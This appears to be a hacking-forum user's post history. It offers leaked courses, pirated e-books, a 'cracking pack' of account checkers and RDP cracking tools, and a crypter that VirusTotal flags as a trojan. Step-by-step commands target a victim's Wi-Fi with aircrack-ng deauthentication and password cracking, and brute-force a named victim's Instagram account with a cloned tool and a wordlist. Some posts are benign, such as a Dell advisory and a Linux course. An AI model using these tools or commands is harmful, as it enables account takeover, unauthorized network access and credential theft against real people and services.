Eminem

Members
  • Content Count

    1,467
  • Last visited

Everything posted by Eminem

  1. [hide] https://anonfile.com/18o3v0yan3/IGRAM_TOOL_Leak_-_Eminem_rar [/hide] :fiesta: :fiesta: :fiesta: :fiesta: :fiesta: :fiesta: :fiesta:
  2. [hide] https://github.com/fdciabdul/fbchecker [/hide] :fiesta: :fiesta: :fiesta: :fiesta: :fiesta: :fiesta:
  3. MP4 | Video: AVC 1280x720 | Audio: AAC 48 kHz 2ch | Duration: 1 Hour | 132.3 MB Genre: eLearning | Language: English The dark web-a bastion of encrypted websites that can be visited and hosted anonymously-is home to criminals and privacy-minded citizens alike. In this course, learn about the social and technical underpinnings of the dark web, as well as how you can access and host websites that are hidden from prying eyes. Instructor Mike Chapple provides some history on the dark web and the Tor Browser, the basic software needed to access the dark web and browse the internet anonymously. [hide] https://anonfile.com/32qbc8x3n0/Learning_Tor_and_the_Dark_Web_rar [/hide]
  4. 「︎ E - BOOK 」︎ HOW TO START CRACKING HOW TO START CRACKING - This EBOOK covers everything u need to know how to start cracking. It also gives you good tips on Combo and Proxy I also give downloads to great cracking tools, configs, how to get combo's etc. Become a great Hero Cracker , start today [hide] https://shoppy.gg/product/U1O4Skj [/hide] ------------------------------ [align=center]「︎ E - BOOK 」︎ SQL INJECTION GUIDE ON ATTACKING & DEFENDING I didn't write this book but I leaked it . It costs over 40 $ . I give it for 3 $ because I am a good soul xD Limited Edition Only 5 Pieces All Contest : https://pastr.io/view/BdUkpE The Book Has Pages : 457 Chapters : 10 Price Per Page Is : 0,006 $ :-D 6,1 MB ( BIG E-BOOK ) I deleted Password from the book so you can edit the book in .PDF Official ANONYMOUS Encyclopaedic I Added There Index [hide] https://shoppy.gg/product/0krX5u5 [/hide][/align]
  5. ...........
  6. Hello guy's Today I come to present you my new cracking pack! It is super complete and compress to make your download easier My cracking pack contains: < Checkers > AIO Amazon 4Shared Mediafire Mega CoinPot Ebay Email Fortnite Minecraft Steam Origin Playstation Uplay Instagram Hostinger Host1Plus FastComet A2Comet Facebook File Factory Hulu Netflix Twitter Twitch Skype SentryMBA SocialClub Storm Uber NordVPN ExpressVPN HMAVpn NordVPN ProtonVPN CyberGhost PureVPN IPVanish Woxy PornHub Blockchain Brazzers G2A Skrill Apple Coinbase Discord Blizzard EpicGame Localbitcoin Microsoft Nordstom Starbucks Wish < Configs > SentryMBA Storm < Cracking Tutorial > 2 Tutorial < Dehashing > Hashcat < Dumping > SQLi Dumper SQLMap < Dorking > SQLi Dork SQLi Dorking < Proxy > GatherProxy KIDUX Proxy uProxy < RDP Cracking > KPORTScan RDP Crack WordList Usernamelist < Tools > AntiPublic ComboEditor Dorker Duplicator Remover Slayer Leecher Split Combo < VPN > Betternet NordVPN [hide] https://mega.nz/#!pMYGBQ4a!CJAuSBNJQ8Vw-5m96RxEaIbqlaSi8bz-NhvufUb-lvc [/hide]
  7. How To Crack A Software [Reverse Engineering] Video Credit:- avi_re Tools Used:- [hide] https://mega.nz/#!oPxyHayC!KobXGQHh2S0w5Or0DJmnsTfgfJwRk4ojsfimNQxDOJY [/hide] 1:- Crackers Kit 2018 Launcher [Download Below] !! WARNING !! This Video Is Just For Educational Purpose. Channel Is Not Responsible For Any Illegal Use Of The Content Provided In The Video CRACKING/HACKING IS ILLEGAL [hide] [video=youtube] http://https://www.youtube.com/watch?v=EkAVHjGqRcg [/hide]
  8. Requirements Some basic knowledge and hands on experience with Linux Description This course will take the students through lectures and hands-on exercises to eventually gain the knowledge and know-how to take the RHCSA exam. Even if the students are not interested in the certification, they can still take this course to gain the knowledge of a junior level Linux systems administrator. Who this course is for: Students who want to pursue a career in Linux systems administration This course includes 4.5 hours on-demand video 1 downloadable resource Full lifetime access Access on mobile and TV Certificate of Completion UDEMY ORIGINAL LINK [hide] HERE [/hide] LEAK LINK [hide] HERE [/hide]
  9. Hey if u want to get started in hacking the first thing u need is a toolbox which contains all of your tools and in hacking we have some of the awesomest toolboxes like Parrot Sec Os , Kali Linux , BlackBox but these Boxes are not so different from each other They are just like Brothers and even the installation is same So lets Get Started FIRST STEPS [hide] First Step is to get a usb drive of around 8GB of space and just Download the iso for your iso in this Case We are going to (https://www.kali.org]install kali Linux Just Download the iso from Download Kali Linux iso From Here according to your PC requirements Downloading the iso You need a software called Rufus or if u dont want to just give the kali linux a try so then just install a virtualization software called Virtual Box The installation process is same for both just if u want to install it on Hard Disk Then you need to Go for one more step What VirtualBox Does is Creates a Virtual Computer in your own computer so anyhting wrong happens in the virtual machine does not efects your physical machine OPTIONAL STEP {ONLY FOT WHO WANT TO INSTALL IT ON HARD DISK } Just Double Click on rufus after clicking you will be prompted with such a window Just Click on select and select your kali iso file and then Jus select your usb stick and then just Hit Start and after that as the process gets completed just simply Reboot your computer from this usb for this u need to open your bios settings by pressing F2 or F12 varries on the system and then select boot from usb INSTALLATION STARTS As Now u will be Prompted with this type of screen Choose Graphical Install Here After That Choose your language After That Just Hit Enter Enter for Hostname and domain Leave it to default as it dont matters Now Set Your root password [//Note:-Root User is the supreme in a linux distro as like admin so set a good password ] Now Just Setup user and password just lets Get Towards the main steps PARTITIONING MAIN STEP It is the Main step as if u are dual booting [Means installing it along side Windows ] as well as Installing it on VirtualBox If you are installing it on VirtualBox then you will get this screen and you need to choose the first option Guided – use entire disk dont worry it does not harm your machine or if u are installing it along side windows then You Have one more option Guided – use largest continious free space You need to choose After than select all files in one Partition all files in one Partition and after that Fininsh Partitioning and write changes to disk and hit enter after that installation begins and you will get this screeN And after that choose no for Network Mirror And installation Starts As the installation gets completed you will get this screen Indicating Installation is completed After That Reboet Happens And you get this scren indicating that Kali Linux is installed perfectley Congrats My friend [/hide]
  10. So Hi guys Now this tutorial gonna cover a most awaited and wanted topic Hacking A WiFi Network Yeah hacking a WiFi network is considered as one of the most wanted hacks of all the time this tutorial gonna cover it in complete detail SO lets start guys! [hide] For this tutorial you need Kali Linux or Parrot Sec OS or even Ubuntu will work You can get Kali Linux from kali.org and i am gonna use that in this tutorial So first of all we need to update our linux distro by typing this command apt update && apt upgrade -y If you are doing it in a VM or in a enviornment in which you cant connect to wifi or if your network card does not support packet injection than you need to buy a new one you can check by googling that either your card will work for wifi hacking or not The good choice is This One you can get this for a cheap price So after the setup connect your wifi adapter with pc and than start the tutorial now type these commands First open your terminal and type these commands 1 airmon-ng check kill [to check the process to kill to start the process] 2 airmon-ng 3 airmon-ng start wlan0 {wlan0 can varry acc to your device you can see the name for your one by typing ifconfig} [make the wifi card ready for wifi hacking] 4 airodump-ng wlan0mon [starting the attack will capture everything now note the channel name and bssid of your target wifi ] 5 airodump-ng -c (ur victims channel here ) – -write /root/Desktop/hack —bssid (bssid) wlan0mon [now the attack started] 6 aireplay-ng -0 0 -a (Bssid) wlan0mon {Bssid will be of your victim} 7 aircrack-ng -a2 -b (bssid) -w /root/Desktop/rockyou.txt {file of your wordlist } /root/Desktop/hack-01.cap {path of captured file} if now the user password was in your wordlist than you will get the password is not present than try a different wordlist in the next tutorial i will tell you how to create a wordlist for a specific user and even a full proof method that give you great succes results NOTE : The 7th command will end according to your computer speed it depends on your machine power and even it can take alot long as it depends on your Wordlist and computer [/hide]
  11. NOTE : Don’t expect that you can hack whatever account you want!This is just the demonstration of how it works!For 100% work you need deeper understanding of it! So Hi, guys i am back here again with one more tutorial and one of the most awaited oneHacking Instagram Accounts [align=center] Yeah you heard it right now this tutorial not gonna include hacking the database of instagram or something very advanced [/align] [hide] So Hi, guys i am back here again with one more tutorial and one of the most awaited one Hacking Instagram Accounts Yeah you heard it right now this tutorial not gonna include hacking the database of instagram or something very advanced So lets start this So the first thing you need is Kali Linux or Parrot Sec os or any other linux OS you can download parrot os from here https://parrotsec.org and kali linux from here kali.org and thats it Now lets start the guide So the first thing you need is a net connection and brain and yeah dont forget linux any distro or flavor So lets start for the purpose of this tutorial i am gonna use the technique of brute force Brute force is the technique of trying random passwords against a single user from a pre defined chrachter set or more specificially we can say i am gonna to talk about a dictionary attack so dictionary attack is an attack in which the passwords are saved in a file from where we try these passwords on a single user Ok so lets start 1 Open Terminal 2 apt update && apt ugrade -y 3 apt-get install git {installing git to clone repo} 4 apt-get install python {installing python } 5 apt-get install python3 {installing python3} 6 cd Desktop { changing directory to desktop } 7 git clone https://github.com/Pure-L0G1C/Instagram (https://github.com/Pure-L0G1C/Instagram) {This command will clone the github repo} OK so after completition of 7th command we need to run 8 chmod +x Instagram after that run cd Instagram Now run python instagram.py -h to get the help menu Now just simply enter this command python/2/3 instagram.py USERNAME OF VICTIM /Path_of_wordlist_file [wordlist file comes already by default in linux or parrot just extract rockyou in /usr/share/wordlists and replace the path ] If the users password is in rockyou than this gonna work but if not than its your badluck but you can try other ways if you want That’s it for now stay tuned gonna post more[/hide]
  12. What you'll learn Use burp suite, capture traffic through burp and do basic web testing. Set Up their own testing environment for practicing hacking safely. understand the working of intercepting proxies and there use in ethical hacking Requirements You should be interested in ethical hacking. A pc with minimum 4 gb ram Description This course will help you to Learn the BurpSuite, the most popular web application security testing tool on planet. If you are doing penetration testing web development or you are a beginner in information security domain then it is a must tool to master .Skills learned over here will accelerate your career in security and secure application deployments .Skills you learn in this course can be immediately used in web application assessments and penetration testing. This course is 100% practical and intensive hands on, so lets strap our belts and dive in the world of web hacking. UDEMY ORIGINAL E-BOOK [hide] https://www.udemy.com/burp-suite-hackers-swiss-army-knife/ [/hide] DOWNLOAD ( TORRENT LINK ) [hide] https://drop.me/BZq9L4 [/hide]
  13. Hyperion is a runtime encrypter for 32-bit and 64-bit portable executables. It is a reference implementation and bases on the paper "Hyperion: Implementation of a PE-Crypter". Changes: Support for 64bit was added. C++ has been replaced by a more clean C implementation. More modular concept allows extensions with custom payloads. DOWNLOAD (DROP.ME) [hide] HERE [/hide] VIRUSTOTAL 4/59 [align=center]Antiy-AVL Trojan/Win32.Occamy Cyren W32/Trojan.ZGCP-7312 Endgame Malicious (moderate Confidence) Microsoft TrojanDownloader:Win32/Banload[/align] [hide] HERE [/hide]
  14. Sysdig falco is a behavioral activity monitoring agent that is open source and comes with native support for containers. Falco lets you define highly granular rules to check for activities involving file and network activity, process execution, IPC, and much more, using a flexible syntax. Falco will notify you when these rules are violated. You can think about falco as a mix between snort, ossec and strace. DOWNLOAD [hide] HERE [/hide] VIRUSTOTAL 1 / 54 [align=center]ClamAV Txt.Malware.Sustes-6779550-1[/align] [hide] HERE [/hide]
  15. Dell EMC Avamar ADMe Web Interface is affected by a local file inclusion vulnerability which may allow a malicious user to download arbitrary files from the affected system by sending a specially crafted request to the Web Interface application. Versions 1.0.50 and 1.0.51 are affected. [hide] Dell EMC Avamar ADMe Web UI 1.0.50 / 1.0.51 Local File Inclusion Restricted - Confidential -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 DSA-2019-092: Dell EMC Avamar Security Update for ADMe Web UI Vulnerability Dell EMC Identifier: DSA-2019-092 CVE Identifier: CVE-2019-3737 Severity: High Severity Rating: CVSS v3 Base Score: 8.6 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N) Affected products: DELL EMC Avamar® ADMe Web UI © 1.0.50, 1.0.51 Summary: DELL EMC Avamar® Data Migration Enabler (ADMe) Web UI requires security updates to address a local file include(LFI) vulnerability. Details: Dell EMC Avamar ADMe Web Interface is affected by an LFI vulnerability which may allow a malicious user to download arbitrary files from the affected system by sending a specially crafted request to the Web Interface application. Resolution: The following Dell EMC Avamar ADMe Web UI hotfix is to address this vulnerability for the affected versions: * EMC Avamar ADMe Web UI © 1.0.50 & 1.0.51 - HOTFIX 310397 Link to remedies: Dell EMC recommends that customers who are registered for Dell EMC Online Support download the applicable patches and software from support.emc.com at their earliest convenience: * EMC Avamar ADMe Web UI © 1.0.50 & 1.0.51 - HOTFIX 310397 If you have any questions, please contact Dell EMC Support. Credit: Dell EMC would like to thank Ken Pyle from DFDR Consulting for reporting this vulnerability. Severity Rating: For an explanation of Severity Ratings, refer to Dell EMC Knowledgebase article 468307. Dell EMC recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability. Legal Information: Read and use the information in this Dell EMC Security Advisory to assist in avoiding any situation that might arise from the problems described herein. If you have any questions regarding this product alert, contact Dell EMC Software Technical Support at 1-877-534-2867. Dell EMC distributes Dell EMC Security Advisories, in order to bring to the attention of users of the affected Dell EMC products, important security information. Dell EMC recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided "as is" without warranty of any kind. Dell EMC disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event, shall Dell EMC or its suppliers, be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or spe cial damages, even if Dell EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply. -----BEGIN PGP SIGNATURE----- iQIzBAEBCAAdFiEEP5nobPoCj3pTvhAZgSlofD2Yi6cFAl0D9A0ACgkQgSlofD2Y i6fzPQ//eEi+Z6QtNAokbNsnrwbz7ee96nH+I1eE0o6nQBpeQiml0dlpKJclYlAL 9t0ofaFGANCIwGtQblFOytOyxqLr+/h/iC+o3c3nhk9ULledRL9+1ZQUeIrOxwNC Tii7QsLoGen62Zb7sg0hywpdU8TkuTjI/wNYjs/3Ro9Z59w2/kOr2ZBOvinjE6gT h7TscEgxWgudnmVZv16ot8dmQEYLUYXidu7NsiSQJmaufzGZKgmfWV8VKEFYft/h ymJw/Zyp6tQK5PrduZ1LorRI0RKvKMuVsJySzihxhcMvV4AhUu1YUf3dfxlJSemR A9FlqCzAfOENnDXSiDQKsHrLbghfhN8bjnqYVKGJB/f7wk1nnRWCjtmEwB5xnS2q 1O0qM4cNUsaBPMChcGXZkM/sftbXTxkPV/H2bCiZ4bO0YEHYo7HdFM204qSU6bMM J5Y/vuM7gOdPCwIfhvWOkoGl2KzzoOyWwG7Bx8X/TbLkxzIbxxKPQLWz9AExxrXK csez48O5AipUmkZLXtL521BnkXAYC8R3gE3ONIuxRRvCe7Az/HDfACruiRk66EzM gIj1qYS1Tnsfyca41T1Mn/mhl+YKBVx4uIxnCd4OTaJkPiff2OmFU9rGlXBjk1UR gt5trn1LopcOypjbyb6ftMDdLQCVfXtIvY1bQkrYznrXnDFvz88= =jcLF -----END PGP SIGNATURE----- [/hide]
  16. Must have a .zip or .rar compressor. [hide] Steps: 1. Save the picture of choice to your desktop. 2. Make a new .rar or .zip folder on your desktop. 3. Add the files you want to hide into the .zip or .rar 4. Click start menu, run, cmd. 5. In Command Prompt type cd "desktop" with the quotation marks. 6. Now type in copy /b picturename.jpg + foldername.rar outputfilename.jpg ( If you use .zip then: copy /b picturename.jpg + foldername.zip outputfilename.jpg) 7. Now there should be the outputed file name with a .jpg extension on the desktop. ( Do not close Command Prompt just yet ) 8. Double click it to open the picture and check it out. 9. When your done looking, and want to view the hidden files Type: ren outputfilename.jpg outputfilename.rar or zip. [/hide] You're done all!
  17. BackBox Linux is a free Open Source penetration testing and security assessment oriented Linux distribution providing a network and systems analysis toolkit. [hide] https://linux.backbox.org [/hide]
  18. [hide] https://mega.nz/?fbclid=IwAR29X1IrqTcmBFROTW93INdLxPP3n_-lTXkajxBu16UouS1eGJ7i4uuXkNY#F!AwtwWSZZ!cNxAcK_-zD6GCrS-EKyOwg [/hide]
  19. If you find yourself with a roommate hogging limited data bandwidth with video games or discover a neighbor has invited themselves into your Wi-Fi network, you can easily take back control of your internet access. Evil Limiter does this by letting you control the bit rate of any device on the same network as you, allowing you to slow or even stop data transfer speeds for them completely. DOWNLOAD [hide] https://drop.me/BZqZyx [/hide] VIRUSTOTAL 0/59 [hide] https://www.virustotal.com/gui/file/d653b93bcc9b9e3ca7a9b77a2410769e9a914365d3f642b9dfaa56774dfdc8dd/detection [/hide]
  20. [hide] Just Download DriverEasy Software on Your Pc/Lappy Go to https://www.drivereasy.com/giveaway/chip/2019/ And Confirm Mail there You also can Use Temo mail https://temp-mail.org/ After Confirming Email you'll get a Licence key On Mail Just copy that key and Paste in Drivereasy Software ? [/hide]
  21. :fiesta: :fiesta: :fiesta: :fiesta: :fiesta: :fiesta:
  22. Learn Node.js by building real-world applications with Node, Express, MongoDB, Mocha, and more! Original Udemy Link : HERE Udemy Download Link [hide] HERE [/hide]
  23. Phone numbers often contain clues to the owner's identity and can bring up a lot of data during an OSINT investigation. Starting with a phone number, we can search through a large number of online databases with only a few clicks to discover information about a phone number. It can include the carrier, the owner's name and address, and even connected online accounts. DOWNLOAD [hide] https://github.com/sundowndev/PhoneInfoga [/hide] VIRUSTOTAL 0 / 54 [hide] https://www.virustotal.com/gui/file/b123ad7117874b3134411a74bf1585086bfe9f389f49acdf56177312db997a07/detection [/hide]